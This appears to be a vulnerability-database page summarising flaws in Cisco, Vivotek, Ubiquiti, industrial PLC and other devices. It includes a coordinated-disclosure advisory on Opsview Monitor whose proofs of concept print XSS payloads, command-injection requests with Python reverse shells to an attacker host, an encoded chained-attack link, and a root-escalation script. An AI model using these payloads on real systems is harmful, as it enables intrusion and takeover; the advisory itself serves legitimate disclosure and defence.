VARIoT IoT vulnerabilities database

Amcrest networked devices use the same hardcoded SSL private key across different customers' installations, which allows remote attackers to defeat cryptographic protection mechanisms by leveraging knowledge of this key from another installation, as demonstrated by Amcrest_IPC-HX1X3X-LEXUS_Eng_N_AMCREST_V2.420.AC01.3.R.20180206. Amcrest_IPC-HX1X3X-LEXUS_Eng_N_AMCREST Contains a cryptographic vulnerability.Information may be obtained. Amcrest is a network camera product from Amcrest Corporation of the United States. An attacker could exploit the vulnerability to bypass the encryption protection mechanism by learning about other installed keys

The web management interface of Ubiquiti airMAX, airFiber, airGateway and EdgeSwitch XP (formerly TOUGHSwitch) allows an unauthenticated attacker to upload and write arbitrary files using directory traversal techniques. An attacker can exploit this vulnerability to gain root privileges. This vulnerability is fixed in the following product versions (fixes released in July 2015, all prior versions are affected): airMAX AC 7.1.3; airMAX M (and airRouter) 5.6.2 XM/XW/TI, 5.5.11 XM/TI, and 5.5.10u2 XW; airGateway 1.1.5; airFiber AF24/AF24HD 2.2.1, AF5x 3.0.2.1, and AF5 2.2.1; airOS 4 XS2/XS5 4.0.4; and EdgeSwitch XP (formerly TOUGHSwitch) 1.3.2. plural Ubiquiti Product Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Ubiquiti airMAX AC, etc. are all products of Ubiquiti Networks in the United States. The Ubiquiti airMAX AC is a wireless access point device. airGateway is a gateway device

A vulnerability in the error reporting feature of the Cisco SD-WAN Solution could allow an authenticated, remote attacker to gain elevated privileges on an affected device. The vulnerability is due to a failure to properly validate certain parameters included within the error reporting application configuration. An attacker could exploit this vulnerability by sending a crafted command to the error reporting feature. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device. Cisco SD-WAN Solution Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco vEdge 100 Series Routers and so on are products of Cisco. The Cisco vEdge 100 Series Routers is a 100 Series router product. vManageNetworkManagementSystem is a network management system. SD-WANSolution is a set of network expansion solutions running in it. Cisco SD-WAN is prone to remote privilege-escalation vulnerability. This issue is tracked by Cisco Bug ID CSCvi69801

A vulnerability in the web-based management interface of Cisco Meeting Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a customized link. A successful exploit could allow the attacker to perform arbitrary actions on an affected device by using a web browser and with the privileges of the user. Cisco Meeting Server is prone to a cross-site request-forgery vulnerability. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCvi48644

A vulnerability in the web-based management interface of Cisco Prime Collaboration Assurance could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a customized link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. Cisco Prime Collaboration Assurance Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCvg15441. This solution supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites

VIVOTEK FD8177 devices before XXXXXX-VVTK-xx06a allow remote attackers to execute arbitrary code (issue 1 of 2) via the ONVIF interface, (/onvif/device_service). VIVOTEK FD8177 The device contains a command injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. VIVOTEKFD8177 is a network camera product from Vivotek. There is a security vulnerability in VIVOTEK FD8177 prior to XXXXXX-VVTK-xx06a

VIVOTEK FD8177 devices before XXXXXX-VVTK-xx06a allow remote attackers to execute arbitrary code (issue 2 of 2) via eventscript.cgi. VIVOTEK FD8177 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. VIVOTEKFD8177 is a network camera product from Vivotek. A command injection vulnerability exists in versions prior to VIVOTEKFD8177XXXXXX-VVTK-xx06a

VIVOTEK FD8177 The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. VIVOTEK FD8177 is a network camera product of Vivotek. There is a cross-site request forgery vulnerability in VIVOTEK FD8177 devices prior to XXXXXX-VVTK-xx06a. A remote attacker can exploit this vulnerability to hijack cgi commands

A vulnerability in the command-line interface (CLI) in the Cisco SD-WAN Solution could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitting crafted input to the CLI utility. The attacker must be authenticated to access the CLI utility. A successful exploit could allow the attacker to execute commands with root privileges. Cisco SD-WAN Solution Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Cisco vEdge 100 Series Routers is a 100 Series router product. vManageNetworkManagementSystem is a network management system. SD-WANSolution is a set of network expansion solutions running in it. Cisco SD-WAN is prone to a local command-injection vulnerability. This issue being tracked by Cisco Bug IDs CSCvi69802 and CSCvi69903

A vulnerability in the Zero Touch Provisioning feature of the Cisco SD-WAN Solution could allow an unauthenticated, remote attacker to gain unauthorized access to sensitive data by using an invalid certificate. The vulnerability is due to insufficient certificate validation by the affected software. An attacker could exploit this vulnerability by supplying a crafted certificate to an affected device. A successful exploit could allow the attacker to conduct man-in-the-middle attacks to decrypt confidential information on user connections to the affected software. Cisco SD-WAN Solution Contains a certificate validation vulnerability.Information may be obtained and information may be altered. Cisco vEdge 100 Series Routers and so on are products of Cisco. The Cisco vEdge 100 Series Routers is a 100 Series router product. vManageNetworkManagementSystem is a network management system. SD-WANSolution is a set of network expansion solutions running in it. Cisco SD-WAN is prone to a security-bypass vulnerability. This issue is being tracked by Cisco Bug ID CSCvi69940

A vulnerability in the web-based UI of Cisco Secure Access Control Server could allow an authenticated, remote attacker to gain read access to certain information in an affected system. The vulnerability is due to improper handling of XML External Entities (XXEs) when parsing an XML file. An attacker could exploit this vulnerability by convincing the administrator of an affected system to import a crafted XML file. An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. This issue is being tracked by Cisco bug ID CSCvi85318

A vulnerability in the web-based management interface of Cisco Data Center Network Manager could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the management interface on an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a customized link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCvh70379. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions

Huawei B315s-22 products with software of 21.318.01.00.26 have an information leak vulnerability. Unauthenticated adjacent attackers may exploit this vulnerability to obtain device information. Huawei B315s-22 is a home 4G router. Huawei B315s-22 is a wireless router made by China Huawei (Huawei)

A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code. The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code. The Cisco RV110W, RV130W, and RV215W are Cisco router products. A buffer overflow vulnerability exists in the management interfaces of many Cisco routers. Cisco RV110W, RV130W, and RV215W Routers are prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will result in denial-of-service conditions. This issue being tracked by Cisco Bug ID CSCvj23206, CSCvj42727, and CSCvj42729. Cisco RV110W Wireless-N VPN Firewall is a firewall product

omron PLC SYSMAC CP1L is a PLC from Omron There is a remote control command vulnerability in omron PLC SYSMAC CP1L. An attacker can use this vulnerability to switch the PLC to monitoring mode and then set and force write to the PLC. It can also operate I / O points and auxiliary relays and can be modified online. program

Hollysys Group is a professional automation company integrating R & D, production, sales and technical services. Hollysys PLC LE5109L has a remote control vulnerability. An attacker can send a constructed packet conforming to the private protocol, and use this vulnerability to cause all PLC output points to go out. PLC All output points are off

Hollysys Group is a professional automation company integrating R & D, production, sales and technical services. Hollysys PLC FCS has a remote control vulnerability. An attacker can use this vulnerability to control the FCS arbitrarily by sending a constructed packet conforming to the private protocol

A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations. The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations. Cisco Umbrella API Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker can exploit this issue to bypass the security mechanism and gain unauthorized access. This may lead to further attacks. This issue is being tracked by Cisco bug IDs CSCvj37940, CSCvj37954, CSCvj37982, CSCvj37993, CSCvj38122, and CSCvj38122

The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Opsview Monitor Multiple Vulnerabilities 1. **Advisory Information** Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145 3. **Vulnerability Description** Opsview's website states that: Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more. 4. **Vulnerable Packages** . Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2 Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1 In addition, Opsview published the following release notes: . https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new 6. **Credits** These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance. 7.1. The following proof of concept demonstrates the vulnerability: /----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/ 7.2. The following proof of concept demonstrates the vulnerability: /----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close [{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/ The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. Excerpt of the source code showing the injected script tag: /----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/ 7.3. **Notification abuse leading to remote command execution** [CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges. The following proof of concept executes a reverse shell: /----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close {"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/ /----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/ Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell. In order to perform the attack, consider the following: . API's sensitive actions require a 'restToken' to be processed. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login. The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator: /----- https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/ Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell. 7.4. **Rancid test connection functionality abuse leading to command execution** [CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter. The following proof of concept executes a reverse shell: /----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2 -----/ /----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/ 7.5. **Script modification could allow local privilege escalation** [CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges. The following excerpt shows the vulnerable code: /----- /etc/init.d/opsview-reporting-module: /opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi DAEMON=/opt/opsview/jasper/bin/rc.jasperserver test -x $DAEMON || exit 0 # Switch to opsview user if run as root id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/ The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group. /----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/ Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted. The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges: /----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;; esac shift done -----/ /----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566) # id uid=0(root) gid=0(root) groups=0(root) -----/ 8. **Report Timeline** 2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published. 9. **References** [1] https://www.opsview.com/solutions 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks 